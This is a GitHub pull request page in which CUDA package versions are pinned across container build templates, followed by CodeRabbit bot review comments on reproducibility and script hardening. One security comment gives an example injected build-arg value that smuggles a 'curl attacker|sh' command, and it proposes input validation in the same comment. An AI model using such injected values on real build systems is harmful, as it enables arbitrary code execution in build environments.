Pin unpinned CUDA packages for reproducible builds (#162) by smoparth · Pull Request #203 · opendatahub-io/base-containers

smoparth · 2026-04-20T12:21:40Z

Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions sourced from NVIDIA's RPM repository. These ODH-specific packages were previously installed without version pins, making builds non-reproducible.

Add NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION build args to template and all 5 app.conf files (12.8–13.2)
Document why cuda-compat is intentionally left unpinned (NVIDIA's forward-compatibility design for GPU driver compatibility)
Add new keys to generate-containerfile.sh so future versions get TODO markers

cuda-toolkit meta-package is left as-is; replacing it with granular packages requires a dependency audit and should be a separate issue.

Description

How Has This Been Tested?

Merge criteria:

The commits are squashed in a cohesive manner and have meaningful messages.
Testing instructions have been added in the PR body (for PRs involving changes that are not immediately obvious).
The developer has manually tested the changes and verified that the changes work

Summary by CodeRabbit

Chores
- Enhanced CUDA container build configuration across versions 12.8–13.2 to enable precise versioning of CUPTI, cuSPARSELt, and cuDSS libraries, resulting in more reproducible and consistent container image builds.

Pin cuda-cupti, libcusparselt0, and libcudss0 with explicit versions sourced from NVIDIA's RPM repository. These ODH-specific packages were previously installed without version pins, making builds non-reproducible. - Add NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION build args to template and all 5 app.conf files (12.8–13.2) - Document why cuda-compat is intentionally left unpinned (NVIDIA's forward-compatibility design for GPU driver compatibility) - Add new keys to generate-containerfile.sh so future versions get TODO markers cuda-toolkit meta-package is left as-is; replacing it with granular packages requires a dependency audit and should be a separate issue.

coderabbitai · 2026-04-20T12:21:59Z

📝 Walkthrough

Walkthrough

This pull request introduces three new build argument parameters (NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION) across CUDA container definitions for versions 12.8, 12.9, 13.0, 13.1, and 13.2. The Containerfile.cuda.template and corresponding individual Containerfiles are updated to declare these arguments and replace unversioned or partially-versioned package references with explicit version-suffixed package installation strings. Configuration files (app.conf) for each CUDA version supply the specific version values for these arguments. The build script that generates Containerfiles was updated to include these keys in its TODO-comment logic.

Estimated Code Review Effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Issues

No actionable issues identified. The changes follow consistent, repetitive patterns across multiple files with identical structural transformations. Version pinning improves reproducibility and supply chain control. All build argument declarations are properly propagated through template and individual Containerfiles.

🚥 Pre-merge checks | ✅ 2

✅ Passed checks (2 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title accurately summarizes the main objective: pinning previously unpinned CUDA packages (cuda-cupti, libcusparselt0, libcudss0) across multiple CUDA versions to enable reproducible builds.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

coderabbitai

Actionable comments posted: 1

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

cuda/12.8/Containerfile (1)

112-120: ⚠️ Potential issue | 🟠 Major

Unbounded dnf upgrade keeps this image non-reproducible.

Line 117 upgrades the whole base at build time, so resulting package versions drift across builds even when newly pinned CUDA subpackages stay fixed.

Suggested fix (deterministic by default)

+ARG DNF_UPGRADE=0
 RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \
-    dnf upgrade -y --setopt=keepcache=1 && \
+    if [ "${DNF_UPGRADE}" = "1" ]; then dnf upgrade -y --setopt=keepcache=1; fi && \
     dnf install -y --setopt=keepcache=1 \
         cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} \
         cuda-compat-${CUDA_MAJOR_MINOR}

As per coding guidelines, **: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@cuda/12.8/Containerfile` around lines 112 - 120, The RUN currently performs
an unpinned "dnf upgrade -y" which makes the image non-reproducible; remove the
unbounded upgrade and only install the explicit CUDA packages with pinned
versions instead. Concretely, delete "dnf upgrade -y --setopt=keepcache=1 && \"
from the RUN line and keep a single "dnf install -y --setopt=keepcache=1
cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION}
cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS
packages you need) so only known, deterministic package versions are installed
rather than upgrading the entire base. Ensure the change targets the RUN that
references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and
cuda-compat-${CUDA_MAJOR_MINOR}.

🧹 Nitpick comments (1)

scripts/generate-containerfile.sh (1)

255-260: Ensure missing NVIDIA keys are inserted, not only annotated.

The loop only adds TODO comments for existing keys. If a source app.conf is missing one of these new keys, generation silently skips it and leaves the new version under-specified.

Suggested hardening

 for key in "${nvidia_keys[@]}"; do
-    # Add TODO comment before each NVIDIA-specific key (if not already present)
-    if grep -q "^${key}=" "${new_conf}" && ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then
-        sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}"
-    fi
+    if grep -q "^${key}=" "${new_conf}"; then
+        # Add TODO comment before each NVIDIA-specific key (if not already present)
+        if ! grep -B1 "^${key}=" "${new_conf}" | grep -q "# TODO: update from NVIDIA"; then
+            sed -i "/^${key}=/s/^/# TODO: update from NVIDIA\n/" "${new_conf}"
+        fi
+    else
+        {
+            echo "# TODO: update from NVIDIA"
+            echo "${key}="
+        } >> "${new_conf}"
+    fi
 done

As per coding guidelines, **: REVIEW PRIORITIES: 3. Bug-prone patterns and error handling gaps.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@scripts/generate-containerfile.sh` around lines 255 - 260, The current loop
only annotates existing NVIDIA keys in new_conf and ignores keys missing from
the source; update the loop that iterates over nvidia_keys to also insert
missing keys into new_conf (not just add a comment) by checking presence with
grep for "^${key}=" and if absent appending a TODO comment plus a placeholder
entry (e.g., "# TODO: update from NVIDIA" followed by "${key}=" or a default
value) into new_conf so the generated config is explicit; keep the existing
branch that prepends the TODO comment when the key exists (the code around the
for loop, nvidia_keys, new_conf, and the sed/grep checks).

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@Containerfile.cuda.template`:
- Around line 22-25: The Dockerfile/template declares build args
NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION, NV_LIBCUSPARSELT_VERSION, and
NV_LIBCUDSS_VERSION and then directly interpolates them into a shell command
(the dnf install invocation), which allows shell metacharacter injection; fix by
validating/sanitizing those ARG values before any shell expansion: add a short
validation step (e.g., a shell snippet using a strict regex like
/^[A-Za-z0-9._+-]+$/) that checks each of NV_CUDA_CUPTI_VERSION,
NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and NV_CUDNN_VERSION if used
similarly) and exits the build with an error if validation fails, or
alternatively switch to using these as literal package names passed without
shell expansion (e.g., pass them into a non-interpolated form or use
--define/--arg-safe mechanism) so no untrusted characters can be executed;
ensure the check/validation appears before the dnf install/command that
interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and
${NV_LIBCUDSS_VERSION}.

---

Outside diff comments:
In `@cuda/12.8/Containerfile`:
- Around line 112-120: The RUN currently performs an unpinned "dnf upgrade -y"
which makes the image non-reproducible; remove the unbounded upgrade and only
install the explicit CUDA packages with pinned versions instead. Concretely,
delete "dnf upgrade -y --setopt=keepcache=1 && \" from the RUN line and keep a
single "dnf install -y --setopt=keepcache=1
cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION}
cuda-compat-${CUDA_MAJOR_MINOR}" (or expand to list and pin any additional OS
packages you need) so only known, deterministic package versions are installed
rather than upgrading the entire base. Ensure the change targets the RUN that
references cuda-cudart-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUDART_VERSION} and
cuda-compat-${CUDA_MAJOR_MINOR}.

---

Nitpick comments:
In `@scripts/generate-containerfile.sh`:
- Around line 255-260: The current loop only annotates existing NVIDIA keys in
new_conf and ignores keys missing from the source; update the loop that iterates
over nvidia_keys to also insert missing keys into new_conf (not just add a
comment) by checking presence with grep for "^${key}=" and if absent appending a
TODO comment plus a placeholder entry (e.g., "# TODO: update from NVIDIA"
followed by "${key}=" or a default value) into new_conf so the generated config
is explicit; keep the existing branch that prepends the TODO comment when the
key exists (the code around the for loop, nvidia_keys, new_conf, and the
sed/grep checks).

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

Push a commit to this branch (recommended)
Create a new PR with the fixes

ℹ️ Review info

⚙️ Run configuration

Configuration used: Central YAML (base), Organization UI (inherited)

Review profile: CHILL

Plan: Pro Plus

Run ID: ea7da75c-da5a-4271-9230-d1bca0ce8b57

📥 Commits

Reviewing files that changed from the base of the PR and between 1d44494 and f3ef386.

📒 Files selected for processing (12)

Containerfile.cuda.template
cuda/12.8/Containerfile
cuda/12.8/app.conf
cuda/12.9/Containerfile
cuda/12.9/app.conf
cuda/13.0/Containerfile
cuda/13.0/app.conf
cuda/13.1/Containerfile
cuda/13.1/app.conf
cuda/13.2/Containerfile
cuda/13.2/app.conf
scripts/generate-containerfile.sh

coderabbitai · 2026-04-20T12:30:45Z

+ARG NV_CUDA_CUPTI_VERSION
 ARG NV_CUDNN_VERSION
+ARG NV_LIBCUSPARSELT_VERSION
+ARG NV_LIBCUDSS_VERSION


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash set -euo pipefail echo "Locate all NV_* interpolations introduced in dnf install lines:" rg -n 'cuda-cupti-\$\{CUDA_MAJOR_MINOR\}-\$\{NV_CUDA_CUPTI_VERSION\}|libcusparselt0-\$\{NV_LIBCUSPARSELT_VERSION\}|libcudss0-cuda-\$\{CUDA_MAJOR\}-\$\{NV_LIBCUDSS_VERSION\}' Containerfile.cuda.template cuda/*/Containerfile echo echo "Check whether allowlist validation exists for these args (expected: no matches before fix):" rg -n 'Invalid NV_\* version|grep -E.*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION|case .*NV_(CUDA_CUPTI|LIBCUSPARSELT|LIBCUDSS)_VERSION' Containerfile.cuda.template cuda/*/Containerfile

Repository: opendatahub-io/base-containers

Length of output: 1820

Validate NV_* build args before shell expansion (CWE-77/CWE-88, Major).

Lines 171–173 interpolate ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and ${NV_LIBCUDSS_VERSION} directly into the dnf install command without validation. Since build args are externally overridable, hostile or malformed values can inject shell metacharacters during image build.

Exploit: NV_LIBCUDSS_VERSION='0.7.1.4-1;curl attacker|sh' executes arbitrary code in the build environment.

Remediation (apply to template, regenerate Containerfiles)

RUN --mount=type=cache,target=/var/cache/dnf,sharing=locked,id=odh-base-containers-cuda-dnf \ + set -euo pipefail; \ + for v in "${NV_CUDA_CUPTI_VERSION}" "${NV_LIBCUSPARSELT_VERSION}" "${NV_LIBCUDSS_VERSION}"; do \ + printf '%s\n' "${v}" | grep -Eq '^[0-9][0-9A-Za-z._:+~-]*$' || { \ + echo "Invalid NV_* version value: ${v}" >&2; exit 1; \ + }; \ + done; \ dnf install -y --setopt=keepcache=1 \ cuda-cupti-${CUDA_MAJOR_MINOR}-${NV_CUDA_CUPTI_VERSION} \ libcusparselt0-${NV_LIBCUSPARSELT_VERSION} \ libcudss0-cuda-${CUDA_MAJOR}-${NV_LIBCUDSS_VERSION}

Also affects: lines 22–25, 60–63 (ARG declarations); generated Containerfiles cuda/13.2, 13.1, 13.0, 12.9, 12.8.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed. In `@Containerfile.cuda.template` around lines 22 - 25, The Dockerfile/template declares build args NV_CUDA_CUPTI_VERSION, NV_CUDNN_VERSION, NV_LIBCUSPARSELT_VERSION, and NV_LIBCUDSS_VERSION and then directly interpolates them into a shell command (the dnf install invocation), which allows shell metacharacter injection; fix by validating/sanitizing those ARG values before any shell expansion: add a short validation step (e.g., a shell snippet using a strict regex like /^[A-Za-z0-9._+-]+$/) that checks each of NV_CUDA_CUPTI_VERSION, NV_LIBCUSPARSELT_VERSION, NV_LIBCUDSS_VERSION (and NV_CUDNN_VERSION if used similarly) and exits the build with an error if validation fails, or alternatively switch to using these as literal package names passed without shell expansion (e.g., pass them into a non-interpolated form or use --define/--arg-safe mechanism) so no untrusted characters can be executed; ensure the check/validation appears before the dnf install/command that interpolates ${NV_CUDA_CUPTI_VERSION}, ${NV_LIBCUSPARSELT_VERSION}, and ${NV_LIBCUDSS_VERSION}.

smoparth · 2026-04-20T18:14:14Z

/retest

smoparth marked this pull request as draft April 20, 2026 12:21

coderabbitai Bot reviewed Apr 20, 2026

View reviewed changes

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Pin unpinned CUDA packages for reproducible builds (#162)#203

Pin unpinned CUDA packages for reproducible builds (#162)#203
smoparth wants to merge 1 commit intoopendatahub-io:mainfrom
smoparth:issue/162-pin-cuda-packages

smoparth commented Apr 20, 2026 •

edited by coderabbitai Bot

Loading

Uh oh!

coderabbitai Bot commented Apr 20, 2026 •

edited

Loading

Walkthrough

Estimated Code Review Effort

Issues

Uh oh!

coderabbitai Bot left a comment

Uh oh!

coderabbitai Bot Apr 20, 2026

Uh oh!

smoparth commented Apr 20, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

smoparth commented Apr 20, 2026 • edited by coderabbitai Bot Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Description

How Has This Been Tested?

Merge criteria:

Summary by CodeRabbit

Uh oh!

coderabbitai Bot commented Apr 20, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Walkthrough

Estimated Code Review Effort

Issues

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot Apr 20, 2026

Choose a reason for hiding this comment

Uh oh!

smoparth commented Apr 20, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

smoparth commented Apr 20, 2026 •

edited by coderabbitai Bot

Loading

coderabbitai Bot commented Apr 20, 2026 •

edited

Loading